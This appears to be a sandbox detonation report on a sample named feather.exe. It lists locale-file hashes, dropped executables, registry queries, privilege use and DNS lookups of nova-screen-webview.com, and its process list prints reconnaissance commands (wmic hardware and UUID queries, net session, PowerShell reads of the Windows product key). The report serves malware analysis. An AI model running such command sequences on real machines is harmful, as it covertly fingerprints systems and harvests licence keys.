| SHA512 | 784ff8dc6011883e931b4b8371e5ada960120931bfdf24f81648f5092fa31db1d03e5d3cf5cd16d57ea7fb7877bb25a28533085ab42bfe40dc25ca7d9cee7ade |
C:\Users\Admin\AppData\Local\Temp\nso2BC3.tmp\7z-out\locales\hi.pak
| MD5 | 9e1788b0f3e330baf2b9356a6c853b20 |
| SHA1 | a2f4b37a418669e2b90159c8f835f840026128d9 |
| SHA256 | c640313e10e985a58d16f928d2428ae278421a070d948733ac68fdf7312090fd |
| SHA512 | b9a577e084f8daeb53fad0a9423661c99cab272125899a16b0b052606a2cb88f823137f3a21b5c06b10e0235321b7faca84cd759bf406fb2dd02c2f598e92cb5 |
C:\Users\Admin\AppData\Local\Temp\nso2BC3.tmp\7z-out\locales\gu.pak
| MD5 | 225167dbdf1d16b3fafc506eb63f6d1d |
| SHA1 | 8651b77f41e3c5b019ccb124a7c8f6449a04b96c |
| SHA256 | ff379dd77136b9b85e7e9fcb5b261ace9c6d9184af3ba2dea35b1757b9bab6d9 |
| SHA512 | a353d36a87b6608578816056647de45a456f9012d399b2cb5cb7b9de867a370fcaf1a90d293f367b9b678d13991294425abd85cf77e971afa0d3e9c316952115 |
C:\Users\Admin\AppData\Local\Temp\nso2BC3.tmp\7z-out\locales\fr.pak
| MD5 | d8b4bc789a0c865fb0981611fb5dcdbc |
| SHA1 | 33f9f03117f0bba56a696f2fa089ba893ee951a2 |
| SHA256 | 52aa0a18ace6347b06a89e3851a1b116812c022dbe41da8942278878b5409cee |
| SHA512 | 58d19e5a3c68c901fa2a0c327a45b410ab9b9e6c39298db48eed25345453dce1a4633afe6277cf53ed558e160065b89c0e38a32caeced47e79783dbda4d74f26 |
C:\Users\Admin\AppData\Local\Temp\nso2BC3.tmp\7z-out\locales\fil.pak
| MD5 | 7354de570c8132723c8e57c4ccb4e7c4 |
| SHA1 | 177780faf460e3c8a643a4d71c7a4621345a8715 |
| SHA256 | 91149190c856195fb330605686acf09c7197e5b7efe37fe2a7c76bb8fb08cc89 |
| SHA512 | a8487a6a7fd46d62e78ca4262de49e12c120268561ee61a642c45efa48116edebeb40cf9e8be229db0bbf06bb6b5457cc54399a08ee6a603e5540ef5ca482798 |
C:\Users\Admin\AppData\Local\Temp\nso2BC3.tmp\7z-out\locales\fi.pak
| MD5 | fe011231bbc8b3a74652f6a38f85bc88 |
| SHA1 | 2b851e46738d466b3a5a470de114d15051b6eb6b |
| SHA256 | 7a3249514585491eb47fe4b579edc27ccc48761e7ad6bc11d113b257132c5dd2 |
| SHA512 | 2a4e5c1409347b4b514556c81ef32c8ae118add28e3469717b13045c8424fed9b817c7988629050ed3e732e0cdca181891b6a8b9e64e4c8d65f004d7c8db9796 |
C:\Users\Admin\AppData\Local\Temp\nso2BC3.tmp\7z-out\locales\fa.pak
| MD5 | c770cfb9fbabda049eb2d87275071b54 |
| SHA1 | 20e41b1802c82d15d41fadaf3dcd049b57891131 |
| SHA256 | dae7e7c87026cd4e8a4cd813cc71def32c86ed47865ce6da5383b66b7021c5bc |
| SHA512 | cda117a60c853f12ade579c34fce22d992b33df1f5001a237767b6e642d5c775c3387bcee05d6557fe5a2f6235f93258954a697d3b9812d2550c4801869f4751 |
C:\Users\Admin\AppData\Local\Temp\nso2BC3.tmp\7z-out\locales\es.pak
| MD5 | a24e01a4947d22ce1a6aca34b6f2a649 |
| SHA1 | 750c2550465c7d0d7d1d63ad045b811b4a26dc55 |
| SHA256 | 848d422be1b8fae74786ed6d6dfa7dd2e97b798b4a9ba1d929085e425b2a54e0 |
| SHA512 | 02fc4ce96aa523ebc204243bbec3347b09cb20bcc0ba66cf9532a6fb26c48f7f2396bbb833f1916f8f081ffc9c6cd2de07315e66c5115042a0b44270fa4468c1 |
C:\Users\Admin\AppData\Local\Temp\nso2BC3.tmp\7z-out\locales\es-419.pak
| MD5 | 6f4613a4a88af6c8bd4ef39edeee3747 |
| SHA1 | c8850a276d390df234258d8de8c6df79240c8669 |
| SHA256 | 8f7b8776e61e3ed5aa33b1a571ac834653b54b12a499d956b95d567b7e1ba987 |
| SHA512 | e5933dcb2aaaa2018ba8b13f4af3dc8a950640ac60acb1b56ad6de24541701d0ffc1f4cb28c7932af924bfd673edcee20bf649156ab95ea9499ec43c703ea141 |
C:\Users\Admin\AppData\Local\Temp\nso2BC3.tmp\7z-out\locales\en-US.pak
| MD5 | 626f30cfd9ad7b7c628c6a859e4013bd |
| SHA1 | 02e9a759c745a984b5f39223fab5be9b5ec3d5a7 |
| SHA256 | 0fd74bb69ad35b3f9391fa760bf0eb0ee73d2bea0066244577ef2abd269513de |
| SHA512 | 9ce902f21fef70c5b5af444b532b36c9a00d896878cb4021c9b1dc07aa3277d956bca65ee0adb68467eec113e535b60a8a5fb5414c7d0ca761ceae5c43b7d9a9 |
C:\Users\Admin\AppData\Local\Temp\nso2BC3.tmp\7z-out\locales\en-GB.pak
| MD5 | 9d9121bdc9af59b5899ce3c5927b55d8 |
| SHA1 | 568626a374cd30237c55b72c74b708da8d065ec1 |
| SHA256 | f4d45ccc89834376f35d4d83fe5b2d5112b8cc315fcb03228720749aae31c805 |
| SHA512 | 149a8acf256dc12f62706f72ad8ec88cbfdf7f8dc874bcd9facf484cdb00e7c5787f5e1bbc12b5bbe1b19b6524e7e8a1c7dba2838abeb9aafa3ce89795fd22ae |
C:\Users\Admin\AppData\Local\Temp\nso2BC3.tmp\7z-out\locales\de.pak
| MD5 | 2163820cd081fdd711b9230dc9284297 |
| SHA1 | c76cc7b440156e3a59caa17c704d9d327f9f1886 |
| SHA256 | 6d787033c94755cc80c187ed8a9de65808bb4d7968354bbb94b7868ac2e8d205 |
| SHA512 | 920fa2a10f7aa7f1f6d911fe2a77eded0384617d8fd863943afd99a584dab3fb2ea3e5d2e20bca529689a99fdf303912007f2918c62482d8a90194a810f6e535 |
C:\Users\Admin\AppData\Local\Temp\nso2BC3.tmp\7z-out\locales\da.pak
| MD5 | 1939faa4f66e903eac58f2564eeb910e |
| SHA1 | bace65ee6c278d01ccf936e227e403c4dff2682d |
| SHA256 | 0b9da7bd6531a7ebe7d8188b320c0953adcfbaf654037f8265261a12e63d3c87 |
| SHA512 | 51588d2fe724e6c407724ea6f46883ded39397af744effaf672f75952a6a734e61e93e59f446080317f2a2b3fa1b45e7405f90fe0b226c44c9f3dd9a4e130a87 |
C:\Users\Admin\AppData\Local\Temp\nso2BC3.tmp\7z-out\locales\cs.pak
| MD5 | 06e3fe72fdc73291e8cf6a44eb68b086 |
| SHA1 | 0bb3b3cf839575b2794d7d781a763751fe70d126 |
| SHA256 | 397134d1834f395f1c467a75d84ef2e8545cb0f81e94dbe78b841fbbdaad802d |
| SHA512 | 211594c30ad4f5ca8813596b59751168c60dfa0d13f24f2aa608fce82d21c2de3de69fe007c4bde1602da8aa7ea81ec0f15e173abc1224362c36b493b425b425 |
C:\Users\Admin\AppData\Local\Temp\nso2BC3.tmp\7z-out\locales\ca.pak
| MD5 | 2d30c5a004715bc8cd54c2e21c5f7953 |
| SHA1 | fed917145a03d037a32abac6edc48c76a4035993 |
| SHA256 | d9c45d55a9a5661063b9bbebb0615de8f567f3925d04fd10938da9617c6220e0 |
| SHA512 | b3803551f53d290d8839789f829afc9c1e12052c81ba20d5e01fb3d2bacd5d1e97bd4c05074322eed17fdec04c9176c655076faec8a3aef17c39fb999e0c1fcf |
C:\Users\Admin\AppData\Local\Temp\nso2BC3.tmp\7z-out\locales\bg.pak
| MD5 | a69f6075863d47b564a2feb655a2946f |
| SHA1 | 062232499ff73d39724c05c0df121ecd252b8a31 |
| SHA256 | a5eb7038ed956bad7704a722f05691474ff709dffbad92b8e31dbb869ad58334 |
| SHA512 | 930ce3938aa02a8bcc609a64bd86b7e6164d63baad157a980fd079859a6bee5db87bd1f7a74a71108f8368bc9c6154bf14a2dba1abf269f572bc262614bcf1db |
C:\Users\Admin\AppData\Local\Temp\nso2BC3.tmp\7z-out\locales\ar.pak
| MD5 | 3c2ab7363018db1f20b90acbc305cb4c |
| SHA1 | 60b9cf453178ad0e60faf20d137a0c7eabde65c9 |
| SHA256 | 3ca47b9c436723f837a53b2904b51efdf13ab6cad2f3ef4fe48a1115847eccbf |
| SHA512 | 589beb3e95e93f30341933c9b9826210e6bf3e9c1ad8f113d9d8a98fa5a526f81e454ee3357fb55d60d67a4890ce33e964ba2fa810e1771a6b7e82746492313a |
C:\Users\Admin\AppData\Local\Temp\nso2BC3.tmp\7z-out\locales\am.pak
| MD5 | 3cfd7c5bb92ab72c63e003208a9e4529 |
| SHA1 | 165d2f69ab6a6e237f0fec943b5577123cefea87 |
| SHA256 | 12e9e1bec1c46e5ea706157726e17a4429acf288a5754fa183bd9b4cf7d3853b |
| SHA512 | cd7c7837d758ea66abc871503cda6fe99ff45990405e60c1133e7c1f4cb29ee69723c9558bb2d3eccb42948da57351f4f095062616686ab2e255acd3c86236f0 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-11 17:49
Reported
2024-06-11 17:55
Platform
win10v2004-20240508-en
Max time kernel
150s
Max time network
151s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe | N/A |
Loads dropped DLL
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ipinfo.io | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\System32\DriverStore\FileRepository\display.inf_amd64_71aa85b0e2292a7a\display.PNF | C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe | N/A |
| File created | \??\c:\windows\system32\driverstore\filerepository\display.inf_amd64_71aa85b0e2292a7a\display.PNF | C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe | N/A |
Enumerates physical storage devices
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz | C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\2 | C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 | C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe | N/A |
Detects videocard installed
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeSecurityPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\feather.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\feather.exe
"C:\Users\Admin\AppData\Local\Temp\feather.exe"
C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe
C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic process where processid=1660 get ExecutablePath"
C:\Windows\System32\Wbem\WMIC.exe
wmic process where processid=1660 get ExecutablePath
C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe
"C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\obligasteis" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=1932 --field-trial-handle=1936,i,9069365023242026152,16471774539526647506,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe
"C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\obligasteis" --mojo-platform-channel-handle=2016 --field-trial-handle=1936,i,9069365023242026152,16471774539526647506,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "net session"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic OS get caption, osarchitecture | more +1"
C:\Windows\system32\net.exe
net session
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 session
C:\Windows\System32\Wbem\WMIC.exe
wmic OS get caption, osarchitecture
C:\Windows\system32\more.com
more +1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get name | more +1"
C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get name
C:\Windows\system32\more.com
more +1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController get name | more +1"
C:\Windows\System32\Wbem\WMIC.exe
wmic PATH Win32_VideoController get name
C:\Windows\system32\more.com
more +1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion' -Name ProductName"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion' -Name ProductName
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic process where processid=1660 get ExecutablePath"
C:\Windows\System32\Wbem\WMIC.exe
wmic process where processid=1660 get ExecutablePath
C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe
"C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --user-data-dir="C:\Users\Admin\AppData\Roaming\obligasteis" --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAABEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=3032 --field-trial-handle=1936,i,9069365023242026152,16471774539526647506,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | nova-screen-webview.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 8.8.8.8:53 | www.facebook.com | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | nova-screen-webview.com | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | nova-screen-webview.com | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | nova-screen-webview.com | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | nova-screen-webview.com | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | nova-screen-webview.com | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
